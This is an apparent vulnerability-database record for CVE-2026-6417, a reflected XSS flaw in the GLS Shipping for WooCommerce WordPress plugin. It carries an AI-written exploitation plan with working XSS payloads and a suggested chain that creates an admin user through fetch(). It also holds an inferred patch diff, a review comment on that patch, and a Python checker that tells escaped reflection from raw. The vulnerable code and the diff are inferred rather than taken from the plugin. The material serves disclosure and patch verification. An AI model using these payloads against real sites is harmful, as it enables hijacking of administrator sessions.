[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fYb_j55ZCqIRzmH4ddLV2my3zVr7R2SUvhIam4Tl6IIw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-6417","gls-shipping-for-woocommerce-reflected-cross-site-scripting-via-failedorders","GLS Shipping for WooCommerce \u003C= 1.4.0 - Reflected Cross-Site Scripting via 'failed_orders'","The GLS Shipping for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'failed_orders' parameter in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","gls-shipping-for-woocommerce",null,"\u003C=1.4.0","1.4.1","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-13 17:16:15","2026-05-14 05:30:30",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F61b9f259-644e-4172-bd99-704b59ec5493?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-6417 (GLS Shipping for WooCommerce)\n\n## 1. Vulnerability Summary\nThe **GLS Shipping for WooCommerce** plugin (up to version 1.4.0) is vulnerable to **Reflected Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin retrieves the value of the `failed_orders` HTTP GET parameter and reflects it back into an administrative notice or a settings page without applying proper sanitization (e.g., `sanitize_text_field`) or output escaping (e.g., `esc_html`). \n\nThis allows an attacker to craft a malicious URL containing JavaScript. When a logged-in administrator clicks this link, the script executes within the context of their session, potentially leading to unauthorized actions such as account takeover or configuration changes.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin.php`\n*   **Query Parameters:**\n    *   `page`: The plugin's admin page slug (inferred as `gls-shipping-for-woocommerce` or `gls-shipping-orders`).\n    *   `failed_orders`: The vulnerable parameter carrying the XSS payload.\n*   **Authentication:** Requires a user with access to the plugin's admin pages (typically `manage_woocommerce` or `manage_options` capabilities).\n*   **Preconditions:** The plugin must be active. 
The attacker must trick an authenticated user into clicking a crafted link.\n\n## 3. Code Flow\n1.  **Entry Point:** The user navigates to an admin URL containing `page=gls-shipping-for-woocommerce&failed_orders=\u003Cscript>...`.\n2.  **Hook Registration:** The plugin likely hooks into `admin_notices` or the admin page rendering callback (registered via `add_submenu_page`).\n3.  **Vulnerable Logic (Inferred):**\n    *   Inside the callback function (e.g., `GLS_Admin::display_notices` or similar), the code checks for the existence of the parameter.\n    *   `$failed_ids = $_GET['failed_orders'];`\n    *   **Sink:** The value is echoed directly into the HTML: \n        `echo '\u003Cdiv class=\"notice notice-error\">\u003Cp>Sync failed for: ' . $failed_ids . '\u003C\u002Fp>\u003C\u002Fdiv>';`\n4.  **Execution:** The browser interprets the unsanitized `failed_ids` as HTML\u002FJavaScript, executing the payload.\n\n## 4. Nonce Acquisition Strategy\nReflected XSS in a `GET` parameter used for displaying notices typically **does not involve a nonce check**. Nonces are intended to prevent CSRF (unauthorized actions), whereas this vulnerability is a failure of output encoding during a simple `GET` request for a page view.\n\n**If the admin page itself requires a nonce (rare for top-level menu views):**\n1.  Use `wp post create` to create a test page containing any GLS-related shortcode if required to load plugin assets.\n2.  Use `browser_navigate` to the plugin's main settings page: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=gls-shipping-for-woocommerce`.\n3.  Use `browser_eval` to extract any nonces if they appear in the source:\n    `browser_eval(\"document.querySelector('#_wpnonce')?.value\")`\n\n*Note: For this specific Reflected XSS, the attack is triggered by the link itself. The reflection is possible because the value is echoed without `esc_html()`; a nonce check on the display path would only make the link harder to forge, it would not replace output escaping.*\n\n## 5. 
Exploitation Strategy\nThe goal is to demonstrate script execution via the `failed_orders` parameter.\n\n### Step 1: Discover the Admin Slug\nDetermine the exact `page` parameter value. Common slugs for this plugin:\n*   `gls-shipping-for-woocommerce`\n*   `gls-wc-shipping`\n\n### Step 2: Construct the Payload\nWe will use a diagnostic payload to prove execution:\n`failed_orders=\u003Cscript>console.log(\"XSS_VULNERABLE_CONFIRMED\")\u003C\u002Fscript>`\n\n### Step 3: Execute the Request\nUse the `http_request` tool to simulate an administrator clicking the link.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=gls-shipping-for-woocommerce&failed_orders=%3Cscript%3Econsole.log(%22XSS_VULNERABLE_CONFIRMED%22)%3C\u002Fscript%3E`\n*   **Method:** `GET`\n*   **Headers:** Must include the administrator's session cookies.\n\n### Step 4: Verify via Browser\nSince this is reflected XSS, the result is visible in the DOM. Use `browser_navigate` to the same URL and check the console logs or the page source for the injected `\u003Cscript>` tag.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure GLS Shipping for WooCommerce v1.4.0 is installed and activated.\n2.  **Administrator User:** Use the existing admin account to access the dashboard.\n3.  **WooCommerce:** Ensure WooCommerce is active, as the plugin depends on it.\n\n## 7. Expected Results\n*   The HTTP response will contain the raw string: `\u003Cscript>console.log(\"XSS_VULNERABLE_CONFIRMED\")\u003C\u002Fscript>`.\n*   The confirmation string will appear in the browser console when the notice renders; there is no `window.console.history` API, so capture it with the browser tooling's console log or by wrapping `console.log` before navigating.\n*   The payload will be rendered inside a `\u003Cdiv>` with classes like `notice` or `notice-error`.\n\n## 8. Verification Steps\n1.  **Manual Source Check:**\n    `wp eval \"echo 'Search for payload in response: ' . (strpos(file_get_contents('URL_HERE'), 'XSS_VULNERABLE_CONFIRMED') !== false ? 'FOUND' : 'NOT FOUND');\"`\n    The request must carry the administrator's session cookie (for example through a stream context passed to `file_get_contents`), otherwise the response is the login page. Search for the unescaped `\u003Cscript>` tag rather than the bare marker: the marker also survives `esc_html()` output, so matching on it alone cannot distinguish a vulnerable build from an escaped one.\n2.  
**DOM Verification:**\n    Use `browser_eval` to check whether a real `\u003Cscript>` element was created inside the notice (a substring search for the marker in `innerHTML` would also match the entity-escaped text a patched build emits):\n    `browser_eval(\"document.querySelector('.notice script') !== null\")`\n\n## 9. Alternative Approaches\n*   **Attribute Breakout:** If the value is reflected inside an input field (e.g., `value='[input]'`), use:\n    `failed_orders=' onclick='alert(1)' type='text`\n*   **HTML Tag Injection:** If scripts are filtered but HTML is not:\n    `failed_orders=\u003Cimg src=x onerror=alert(1)>`\n*   **Admin Action Chain:** Attempt to use the XSS to trigger an administrative action, such as creating a new admin user via a `fetch()` call to `user-new.php` inside the payload.","The GLS Shipping for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) due to insufficient input sanitization and output escaping on the 'failed_orders' parameter. An unauthenticated attacker can exploit this by tricking a logged-in administrator into clicking a crafted link, leading to arbitrary JavaScript execution in the admin's browser session.","\u002F\u002F Inferred from Research Plan as the source files were not provided\n\u002F\u002F Likely within an admin_notices hook or admin page rendering callback\n\n$failed_ids = $_GET['failed_orders'];\necho '\u003Cdiv class=\"notice notice-error\">\u003Cp>Sync failed for: ' . $failed_ids . '\u003C\u002Fp>\u003C\u002Fdiv>';","--- a\u002Fincludes\u002Fadmin\u002Fclass-gls-admin.php\n+++ b\u002Fincludes\u002Fadmin\u002Fclass-gls-admin.php\n@@ -10,2 +10,2 @@\n-$failed_ids = $_GET['failed_orders'];\n-echo '\u003Cdiv class=\"notice notice-error\">\u003Cp>Sync failed for: ' . $failed_ids . '\u003C\u002Fp>\u003C\u002Fdiv>';\n+$failed_ids = isset($_GET['failed_orders']) ? sanitize_text_field($_GET['failed_orders']) : '';\n+echo '\u003Cdiv class=\"notice notice-error\">\u003Cp>' . esc_html__('Sync failed for: ', 'gls-shipping-for-woocommerce') . esc_html($failed_ids) . 
'\u003C\u002Fp>\u003C\u002Fdiv>';","The vulnerability is exploited by crafting a malicious URL that targets the WordPress admin dashboard. An attacker identifies the plugin's admin page (e.g., wp-admin\u002Fadmin.php?page=gls-shipping-for-woocommerce) and appends a 'failed_orders' GET parameter containing an XSS payload, such as \u003Cscript>alert(1)\u003C\u002Fscript>. The attacker then tricks an authenticated administrator into clicking this link. Because the plugin reflects the parameter value directly into an administrative notice without using functions like esc_html(), the browser executes the script in the context of the administrator's session. No nonce is required for this reflection as it occurs during a standard GET request used for page display.","gemini-3-flash-preview","2026-05-14 17:12:03","2026-05-14 17:14:12",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.4.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgls-shipping-for-woocommerce\u002Ftags\u002F1.4.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgls-shipping-for-woocommerce.1.4.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgls-shipping-for-woocommerce\u002Ftags\u002F1.4.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgls-shipping-for-woocommerce.1.4.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgls-shipping-for-woocommerce\u002Ftags"]
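Review bot: in the `+` lines of the inferred fix, `sanitize_text_field()` strips a `<script>...</script>` block (and any other tag) before `esc_html()` runs, so a tagged payload collapses into an empty "Sync failed for: " notice rather than an escaped, readable one; given that the parameter is named `failed_orders`, consider also validating the value as a comma-separated list of integers (for example `array_map('absint', explode(',', $value))`) so the notice only ever shows order numbers. The `isset()` guard and the switch to `esc_html__()` plus `esc_html()` on the echoed value are the right fix for the reflection itself.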
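The verification steps above (sections 7 to 9 of the research plan) search a response for the bare marker string, which is present whether the plugin reflected the payload raw or entity-escaped it. The following Python is an added example, not code from the GLS Shipping for WooCommerce plugin or from this page: it builds the probe URL, classifies a response as raw, escaped or absent reflection, and contrasts that with a marker-only check. The admin endpoint, the `gls-shipping-for-woocommerce` slug and the notice markup are assumptions taken from the plan, and `wp_strip_all_tags`/`esc_html` here are simplified stand-ins for the WordPress functions, written to mirror what the inferred fix (`sanitize_text_field()` then `esc_html()`) does to the two payloads the plan discusses.

```python
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumed from the research plan (not confirmed by the page): admin endpoint,
# page slug and the diagnostic payload.
BASE_URL = "http://localhost:8080/wp-admin/admin.php"
PAGE_SLUG = "gls-shipping-for-woocommerce"
PARAM = "failed_orders"
MARKER = "XSS_VULNERABLE_CONFIRMED"
PAYLOAD = f'<script>console.log("{MARKER}")</script>'
ATTR_PAYLOAD = "' onclick='alert(1)' type='text"  # the plan's attribute-breakout variant


def build_probe_url(payload: str = PAYLOAD, slug: str = PAGE_SLUG) -> str:
    """The link an administrator would be lured into opening. urlencode()
    percent-encodes <, >, ", ( and ), which is what a browser sends."""
    return f"{BASE_URL}?{urlencode({'page': slug, PARAM: payload})}"


def probe_param(url: str) -> str:
    """Decode the failed_orders value back out of a probe URL (round-trip check)."""
    return parse_qs(urlsplit(url).query)[PARAM][0]


def wp_strip_all_tags(text: str) -> str:
    """Simplified stand-in for WordPress wp_strip_all_tags(), the tag-removal step
    inside sanitize_text_field(): drop <script>/<style> blocks with their contents,
    then remove any remaining tags. An approximation, not the WordPress code."""
    text = re.sub(r"<(script|style)[^>]*?>.*?</\1>", "", text, flags=re.I | re.S)
    return re.sub(r"<[^>]*>", "", text)


def esc_html(text: str) -> str:
    """Stand-in for esc_html(): htmlspecialchars() with ENT_QUOTES (' becomes &#039;)."""
    return html.escape(text, quote=True).replace("&#x27;", "&#039;")


def render_notice_vulnerable(failed_orders: str) -> str:
    """Constructed mirror of the page's inferred pre-fix echo: raw concatenation."""
    return f'<div class="notice notice-error"><p>Sync failed for: {failed_orders}</p></div>'


def render_notice_patched(failed_orders: str) -> str:
    """Constructed mirror of the inferred fix: sanitize_text_field() then esc_html()."""
    safe = esc_html(wp_strip_all_tags(failed_orders))
    return f'<div class="notice notice-error"><p>Sync failed for: {safe}</p></div>'


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """'raw'     -> payload is in the response verbatim: the browser will execute it.
    'escaped' -> only the entity-encoded form is present: rendered as text, not exploitable.
    'absent'  -> nothing recognisable came back (stripped, or the parameter is unused)."""
    if payload in body:
        return "raw"
    if esc_html(payload) in body:
        return "escaped"
    return "absent"


def marker_only_check(body: str, marker: str = MARKER) -> bool:
    """The plan's strpos()-style check. It is also true for the escaped form, so it
    cannot tell an esc_html()-only fix apart from the vulnerable build."""
    return marker in body


if __name__ == "__main__":
    print(build_probe_url())
    for name, render in (("vulnerable", render_notice_vulnerable),
                         ("patched", render_notice_patched)):
        for p in (PAYLOAD, ATTR_PAYLOAD):
            print(f"{name:10s} {classify_reflection(render(p), p):8s} {render(p)}")
```

Against the constructed responses, the `<script>` payload comes back `raw` from the vulnerable renderer and `absent` from the patched one (the tag strip removed it entirely, which is why the notice text alone is not proof of a fix), while the attribute-breakout payload, which contains no tag, comes back `escaped`: that is the case where a marker-only search still reports FOUND on a patched build.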